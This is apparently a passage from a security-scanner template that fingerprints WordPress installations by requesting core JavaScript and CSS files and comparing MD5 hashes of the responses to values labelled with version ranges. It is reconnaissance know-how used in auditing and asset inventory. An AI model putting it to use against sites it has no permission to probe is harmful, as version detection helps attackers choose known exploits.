- - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"ca890daf69ca1fa4112ed913a3a5afcb\" == md5(body))" - - type: dsl - name: 4.0 - 4.1 - dsl: - - "(\"15412686f8145bd551c34f16b2a760a2\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"1f89aaa0c6869d92c26386d3fdf3a394\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"6c9436bcb7fab07b86de4e469279eb22\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"12489a4a2667144f42dc607e77a2c2f6\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"454d6c7240151c150a4d52a169cf5ff7\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"c3fd752894ae74b3f9f1b443b30c813d\" == md5(body))" - - type: dsl - name: 4.4.20 - 4.4.24 - dsl: - - "(\"7ccdb368b0e1d219ce7552fd266db94e\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"881779f4a5a994adc3767d405ec5cb0e\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"2c17fb7873f73e7f6a19d201a35cb9ae\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"de96972a78218f779e8113fca52ab704\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-audiovideo.js" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"f256503caa6bc23b44c82e3f46b6b23b\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.19 - dsl: - - "(\"17236090dcb388dd84b091ae7e373ae4\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.24 - dsl: - - "(\"f46820fc85dbf7cb188fa00f5e86eb83\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"197572f6fff30edee0fdc406462726d8\" == md5(body))" - - type: dsl - name: 4.1.1 - 4.1.32 - dsl: - - "(\"7adbf03fa2ee150196ec223a7470cbf0\" == md5(body))" - - type: dsl - name: 4.0 - 4.1 - dsl: - - "(\"7825ea43bee309c4445058686b673caf\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"2609a8c949595ad5dfa6bece456265ff\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"b6e377d5177058bc872fd72c625df119\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"9cebbb22b93c5354519ee9a29b60e902\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"4879c39c078d74b588260e5c73e9d141\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"c75f0993477d7c824f929b5c3d788ea8\" == md5(body))" - - type: dsl - name: 4.4.20 - 4.4.24 - dsl: - - "(\"552b12e63a3129de9a94e41889962139\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"ea6650e32a7bc1986c28750f2e4aca6b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"54d8075995b61d4ddae11c67e8ff0667\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"c31fd0b6ddd2e9fb0c741aa693d4dfe8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/widgets/custom-html-widgets.min.js" - matchers: - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"551cd10292d57f7a63b336d372dd63e7\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.0.11 - dsl: - - "(\"91ded92347b6cc64e9724408d9defa09\" == md5(body))" - - type: dsl - name: 5.1 - dsl: - - "(\"23ec4608b1a4efda2c3c52c1b945836a\" == md5(body))" - - type: dsl - name: 5.1.1 - 5.2.9 - dsl: - - "(\"feff6bb5c7894507ea30bd0cd7648439\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"d3810da7cecafa8ef492ef7760efdbc2\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"da10249779e84eb738fb4f95395f4a15\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-views.min.js" - matchers: - - type: dsl - name: 4.7.3 - 5.2.9 - dsl: - - "(\"000d91b0de96556e03c3053f728b2987\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.2 - dsl: - - "(\"c5f0abb73e687faebc9bf225a1e0824e\" == md5(body))" - - type: dsl - name: 3.9.1 - 4.4.24 - dsl: - - "(\"05b8ea5fb11adb182563ddb989e091d1\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"83c37717273f92513d2f93ca28931fe4\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"169588faa7a29c0efa54e3caadadc3bf\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"1a660eba3ebcb7a4628726cbe7379066\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-preview-nav-menus.min.js" - matchers: - - type: dsl - name: 4.7.1 - 5.2.9 - dsl: - - "(\"526952e7a87a339b276f5dcfc96c5176\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"4f1fc16aa63323570bfde1539ec30245\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"53d806ed3ac6a8a1d318f4b30e6710a5\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"491a7743fca230e82b84982a8ff59418\" == md5(body))" - - type: dsl - name: 4.3 - 4.4.24 - dsl: - - "(\"696de30f3cf4547a2aaa8fe0e952b6d1\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"310df817c0cfdfd6fd874c0f8d815714\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"11a79ea66a6057723dcb30218375f194\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-selective-refresh.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"baee98ea647db53f68e17624fe74142b\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"3fd4dd5652ec927a08af04d6ee78b931\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.2 - dsl: - - "(\"9f99120370b704e6c7d40f9a5705e823\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"1969be970d4928a749df77e59b27c788\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"2abe93f2d7a83cf5707e9d09c8666de7\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"348d0fec979d6f8669f9e771d870b820\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.2 - dsl: - - "(\"3b1646e8a61a8a2e8001c3d9cc85883b\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.2.9 - dsl: - - "(\"aefff2962b2f3da789019ca890e97f83\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"fcac029c576eba52ee643630959205b8\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"3400ae02caacb104f1ee4c26adfa86bc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/customize-models.min.js" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"e715ea6806c9fdb94aa4d56812dd0217\" == md5(body))" - - type: dsl - name: 3.9.1 - 4.5.23 - dsl: - - "(\"4f4b04852e86713b9f7490e74ee8820a\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"aa94f4d4ff1df18548142ad13d427ca5\" == md5(body))" - - type: dsl - name: 4.9 - 5.2.9 - dsl: - - "(\"1f1c22726066146cbe889da7288dd45b\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"bba23cbc9478a251a816c14aa4074ec0\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"c2fc10cb436eb00cdaf8b1ef9a6189f2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mce-view.min.js" - matchers: - - type: dsl - name: 4.8.2 - 4.8.15 - dsl: - - "(\"33ee9226013e0103d805385f03ebd1eb\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"27da44a32d58d85456db41abc06bedd6\" == md5(body))" - - type: dsl - name: 4.7.6 - 4.7.19 - dsl: - - "(\"602fc8936631c7079b786cbbac621dd8\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.5 - dsl: - - "(\"8e41e6dfd2bc21ec39bd995451083e3b\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.3 - dsl: - - "(\"26a64b5857f1fa98167856ac39b0a268\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.20 - dsl: - - "(\"fae23eefe8da67b53ebae7fe69c5a3d8\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.6 - dsl: - - "(\"8f1af3af83b1bc0ef7aecef9e5cc321d\" == md5(body))" - - type: dsl - name: 4.4 - 4.5.9 - dsl: - - "(\"9ee110328baeee9a859f687924ec188a\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.5.23 - dsl: - - "(\"0a1ee06ff6afbc7e8fa3aa042a88a9f2\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.11 - dsl: - - "(\"42c639526ec5b00732f0fb2e7b0d6a53\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.25 - dsl: - - "(\"ed623af79c9fa06e85b845ee9421a111\" == md5(body))" - - type: dsl - name: 4.2.3 - 4.2.15 - dsl: - - "(\"e3a253b2b4de734d3a11a3934be5dd65\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.2 - dsl: - - "(\"924fa693f18b70b70c3f76ad13142bb2\" == md5(body))" - - type: dsl - name: 4.2.16 - 4.2.29 - dsl: - - "(\"81adc1a2adc7b15f6b5d5f151c880af3\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.18 - dsl: - - "(\"cb3deca0110cd39ea85a9a3b65d3162f\" == md5(body))" - - type: dsl - name: 4.1.19 - 4.1.32 - dsl: - - "(\"399743416c751e4d8b55d0398b69a675\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.18 - dsl: - - "(\"274729193f8ab542fd1979bba987db49\" == md5(body))" - - type: dsl - name: 4.0.19 - 4.0.32 - dsl: - - "(\"294d02cbc00b2310c0d5cf11c55a2ba0\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"332d2f8f3ee47dde343517e278928c52\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"140e4a74c6be70800fcef20fce9ae444\" == md5(body))" - - type: dsl - name: 3.7 - 3.8.33 - dsl: - - "(\"40092f2fbf830be89b8c4db99c9008b0\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"5c9bdc4d0fc3392189943f92ba6866d7\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"f61e2fe8bcc3e3a8f0d4b60db44e01a4\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.2.9 - dsl: - - "(\"280263cbe063651d578398c8d4046cc8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5a54019a3f7e48c4249361115f8e41ec\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"877eec8c4cabdf1e49a86a93d77dc9c7\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.8.35 - dsl: - - "(\"f62250845c0562ef7cccb70d6522c468\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/editor.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"df77ac2726ff3184ff4a1e98ff5b2b7b\" == md5(body))" - - type: dsl - name: 4.7.3 - 4.7.19 - dsl: - - "(\"d23fdbfc8b0862fb2f292802ccb8a60d\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.2 - dsl: - - "(\"0ba8d7fa20e86f60b06176c72130bc4d\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"5a0be8ac9af0e5b7b226614028b43e98\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6e13c98d1b89242683a6a1f0ffe3466e\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"0f147f511b5b2fc8655ab54e06d0cc67\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"703c7f914fa4199de132f72d5b753f80\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"a71c41c4b1c1f15084fe96f5f6d5e095\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"7af92b8e79eb872268168985e58f929b\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a2c51851e5047cc75a589776eb121e3c\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"18350be6b3460d492e38b872b98096b7\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"4108ed5fd8a75d5f27078e93ea36a5a1\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"5d34ed8fe7919c5f5033866fcecdbe9a\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"b31212dac1e1d3e209ae744e60feec97\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"183b9588a66b858c3d0d3400bc656a49\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"b5d03f70f0d0cb3ab958a14fa05d429e\" == md5(body))" - - type: dsl - name: 4.9.2 - dsl: - - "(\"afb2c16bfc582737cabffd2957caf7aa\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"72b7a034ba598088d699dca7b02b6f0b\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"066c2527266f538d9d4acad0cbad13b7\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"9d022867c4e76a4d14c4c8b12b0765b9\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"4bbcdba80298c38da1020c92bead6dd3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/customize-preview-rtl.css" - matchers: - - type: dsl - name: 4.7.1 - 4.8.15 - dsl: - - "(\"514952b81c6dbef19b62b040e76484f9\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"aa094951adcb751c299c0bd6b88468a8\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"085c8450a198ee8d1e655b4864056777\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"f6c1fb0448444810959c4c9b94ef2cb0\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2cb3162100ec30ee6d02f9b833de3b96\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"9f16dff935c6b68c4d43ee641795a4a9\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"36571e36be8cce5ed3cce6974430b474\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"d532290da96647a06230087dcfce2cee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/imgareaselect/jquery.imgareaselect.js" - matchers: - - type: dsl - name: 4.3 - 4.9.4 - dsl: - - "(\"7a0e1bfc429252530cfb8318f53a5986\" == md5(body))" - - type: dsl - name: 3.7 - 4.2.29 - dsl: - - "(\"55a6b7fb4b1b287497d3fc30910e97ce\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"7958066469b0a567962a6355d9c5f817\" == md5(body))" - - type: dsl - name: 3.4.2 - dsl: - - "(\"6bc47583ef2dfc50dda136132e465b5f\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.1 - dsl: - - "(\"20f4d36a0d371e99909c5888b5903dcc\" == md5(body))" - - type: dsl - name: 3.2 - 3.3.3 - dsl: - - "(\"1c8df6748c944b8bbbdc81b4774c590c\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"4295587170c3f16d76082f79ad9ff8e9\" == md5(body))" - - type: dsl - name: 2.9 - 3.0.6 - dsl: - - "(\"eb1bcd7d2f86645bb7265803ff189c95\" == md5(body))" - - type: dsl - name: 4.9.5 - 5.3.6 - dsl: - - "(\"63ec4a65e41151dfd5c85e88fc98a42c\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"58434a61140e1f5ffc4d8fdefbd8c185\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/mediaelement/wp-playlist.js" - matchers: - - type: dsl - name: 4.5 - 4.9.2 - dsl: - - "(\"aaf77f7481f419f5f8c46ae338820443\" == md5(body))" - - type: dsl - name: 4.0 - 4.4.24 - dsl: - - "(\"0ec99859384076f01ce50727d9bf18b3\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"49c9650815be34444bf6f171eaf9c7c2\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"bbb0981d3bb6131a999a42a42dcce185\" == md5(body))" - - type: dsl - name: 4.9.3 - 5.0.11 - dsl: - - "(\"b135057e7d04c299ca1e9b7d6055f4ed\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"92f80679cff32ca6b23ba0137731b5fb\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"ab1f84089f871d9658886c22a46ff080\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/wplink.js" - matchers: - - type: dsl - name: 4.8.2 - 5.0.2 - dsl: - - "(\"6563181820c6b50a36ab7249198bdfea\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"fb20e3b0720c69a5bc3c6afff8e9db29\" == md5(body))" - - type: dsl - name: 4.7.6 - 4.7.19 - dsl: - - "(\"fd437907913d9ff37c7b68191f011363\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.5 - dsl: - - "(\"f955840763cec05064af68c3505fc98a\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"d1ca5593704c028cafa1e8bbd15f1b99\" == md5(body))" - - type: dsl - name: 4.6.7 - 4.6.20 - dsl: - - "(\"57ea74a73e7645136c0a9cc5abbd540a\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.6 - dsl: - - "(\"02348d98fc99d773c62a13fbcae96d68\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.9 - dsl: - - "(\"a7e67b7e7f5c322959dc66b35f1eda5b\" == md5(body))" - - type: dsl - name: 4.5.10 - 4.5.23 - dsl: - - "(\"9914791ca8d1c20816f66b3ee6a3c575\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.10 - dsl: - - "(\"3449cc137556743fcfa8270a1480c1e2\" == md5(body))" - - type: dsl - name: 4.4.11 - 4.4.24 - dsl: - - "(\"8c308b4742cb277f10492615392c7c7a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.11 - dsl: - - "(\"bb9a4f6e9e3f4f0578a8216e47621127\" == md5(body))" - - type: dsl - name: 4.3.12 - 4.3.25 - dsl: - - "(\"72f75b21018ea87dde7985ac76412713\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.15 - dsl: - - "(\"5c88246db88479ae6c91651d19eaedea\" == md5(body))" - - type: dsl - name: 4.2.16 - 4.2.29 - dsl: - - "(\"624e27eeb0275c0d0856e22e23456e13\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.18 - dsl: - - "(\"5e6da10bd91d3bc1efdb71c105f8293c\" == md5(body))" - - type: dsl - name: 4.1.19 - 4.1.32 - dsl: - - "(\"134e15484be933063a7b5e72c201fd88\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.18 - dsl: - - "(\"cb46666ddb54cb5220c58c529b72b068\" == md5(body))" - - type: dsl - name: 4.0.19 - 4.0.32 - dsl: - - "(\"26500607f021bfaa5b1462e48c0ee7e5\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.19 - dsl: - - "(\"6641471b76e06bb7ca734cc620549d59\" == md5(body))" - - type: dsl - name: 3.9.20 - 3.9.33 - dsl: - - "(\"7d8dcae6fc67866464349fe714829901\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.21 - dsl: - - "(\"0d245718982f036887e169f79ceaba88\" == md5(body))" - - type: dsl - name: 3.8.22 - 3.8.35 - dsl: - - "(\"ffc517a6eb9a057222e152f58a9bf098\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.21 - dsl: - - "(\"3e14409d11ab45bb0f2c90e60978384f\" == md5(body))" - - type: dsl - name: 3.7.22 - 3.7.35 - dsl: - - "(\"f8a7e3f7491e199375f554e43e90f3e1\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"898be13a9020c5f02e3c35f94b173557\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"628548fcce211ffe2df025d71d5d1001\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"c1b068acfed8ce07852470f45b777a43\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"a8f124022bc4799e62c8b58f7db6989d\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"ad293791760966322c4dda8bc3329848\" == md5(body))" - - type: dsl - name: 5.1 - 5.3.6 - dsl: - - "(\"ccf54fa65c9b33ce8d2069bd8e3fa0c4\" == md5(body))" - - type: dsl - name: 5.4 - 5.6 - dsl: - - "(\"552e613b678cb04a27dab9122e721ea1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/postbox.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"ddfe27f4efae737b800bad96ed8a0969\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"5bdffa0bca3aa2a832ebae263bb7f8cb\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.24 - dsl: - - "(\"16f96070d454f607633aa9234c71fdd5\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"f07216a42e8487aea5738f6d71b5c7d3\" == md5(body))" - - type: dsl - name: 4.0 - 4.3.25 - dsl: - - "(\"8bf00b23dafb248f022d8b21693e0418\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.9.33 - dsl: - - "(\"1c663bd092f4cdf5f18344d493f3e20b\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"622b17ff667f50e0ed37db8993407e73\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"084dc85c20f5d1eb23a25441eaf714c7\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"1a7ea068ca15d7249279dfba54ff87ad\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"6219e9663ede786bff44bbf756b37c76\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"117e10b1b305c87fcdcd57b122188e55\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"fdc229b9e4beb2e87db12206402e4668\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"21c0429ec7415594fb008adc844d312d\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"3b99d039afbb7196baa78450c0a345e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/admin-bar.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"b2e733f0c117e30ac8974dcc69ab11d8\" == md5(body))" - - type: dsl - name: 4.3 - 4.5.23 - dsl: - - "(\"5bd4dfd347e0592a6bc8a5b9d6b070fc\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"78e3a64f61738d7bf52d7627e6260c23\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"0f3dc51f78d4b14bda30cb12cf062a7c\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"974be2549060c521272558a85b1ce3e1\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"725d72af8994225dc221211cd8120e8e\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"5f7b0e488ff4124ec5c4636186c2aaae\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"9c6442635f5e064bdb407b9f9cf0c8f4\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"3cd6f647119b7e18f59945d397c30c3f\" == md5(body))" - - type: dsl - name: 5.3 - dsl: - - "(\"c6ddf28ff950f8a3169a771f16b54b34\" == md5(body))" - - type: dsl - name: 5.3.1 - 5.3.6 - dsl: - - "(\"990a02987267bae995291b115857b5af\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"bb4c98a582dc6fccad187447328ca65a\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"f7d5140804d46ebae1b075dc92bc17a0\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"e3755ebeee513e368100f6764ff86863\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/modern/colors.css" - matchers: - - type: dsl - name: 5.5 - dsl: - - "(\"50133084c104b9bd63224ef52111c1e4\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.6 - dsl: - - "(\"ddaab5f3a810428b4584c77ebcf5c3df\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/modern/colors-rtl.css" - matchers: - - type: dsl - name: 5.5 - dsl: - - "(\"34a4f9f830f96bbedd820af0e6d8eec5\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.6 - dsl: - - "(\"c3a2c4a3828c0be8b3492aeaa66c5a70\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/modern/colors.scss" - matchers: - - type: dsl - name: 5.5 - dsl: - - "(\"98a7912681f8eed611164ea4bbba4a66\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.6 - dsl: - - "(\"8aa858ffccaf9bc552d66ad90846f29c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/modern/colors-rtl.min.css" - matchers: - - type: dsl - name: 5.5 - dsl: - - "(\"b065fcf45b87cf191ba9ce41c99fa971\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.6 - dsl: - - "(\"377da0d0eefd24ce110066de3ddd6baf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/colors/modern/colors.min.css" - matchers: - - type: dsl - name: 5.5 - dsl: - - "(\"bf9e3629961d4c7aaf4f6f4c84ba1d84\" == md5(body))" - - type: dsl - name: 5.5.1 - 5.6 - dsl: - - "(\"1aab7203b65801018a6f8ea5c0a91f44\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/media.min.js" - matchers: - - type: dsl - name: 4.6 - 5.0.11 - dsl: - - "(\"9be63adbaf5a5acfdbfdd555dc19777d\" == md5(body))" - - type: dsl - name: 4.2 - 4.5.23 - dsl: - - "(\"2e8efd83242126157ff0bffd5e249159\" == md5(body))" - - type: dsl - name: 4.0.1 - 4.1.32 - dsl: - - "(\"9f8b1a50cba5f06427ffe004043128c9\" == md5(body))" - - type: dsl - name: 4.0 - dsl: - - "(\"1c1a6cef0123a419a9fb9595c199fe78\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"3cc25c8aa2e2d4c4a164691cd70ddf73\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.33 - dsl: - - "(\"fdac3c9c1567fea9f5f1fc1a2f29517e\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.33 - dsl: - - "(\"7f667bc10fca561ca610d12be057d75f\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"ffccf4fd05e4c7b3bc1e9ef33c378ae1\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"7fe26c4e0d3b4b83cbc359066bb7bb37\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"149fa83dc3c3baaea6891e4ec34b6ad8\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ae4f49117ed3eee9825a55bf439b49b8\" == md5(body))" - - type: dsl - name: 3.8.34 - 3.8.35 - dsl: - - "(\"45c47322e851a00e440a6e2d26174dcb\" == md5(body))" - - type: dsl - name: 3.7.34 - 3.7.35 - dsl: - - "(\"5ee094206a409c7b1f0e7ad0883b677a\" == md5(body))" - - type: dsl - name: 5.5 - 5.6 - dsl: - - "(\"dc89e6f924d1bea954cbadebbf88a08f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/edit-comments.min.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"de6d5d8283b0fb6a34f5c99569f910ef\" == md5(body))" - - type: dsl - name: 4.6 - 4.7.19 - dsl: - - "(\"a219a0b276225bb3bacac8c2cb3776b4\" == md5(body))" - - 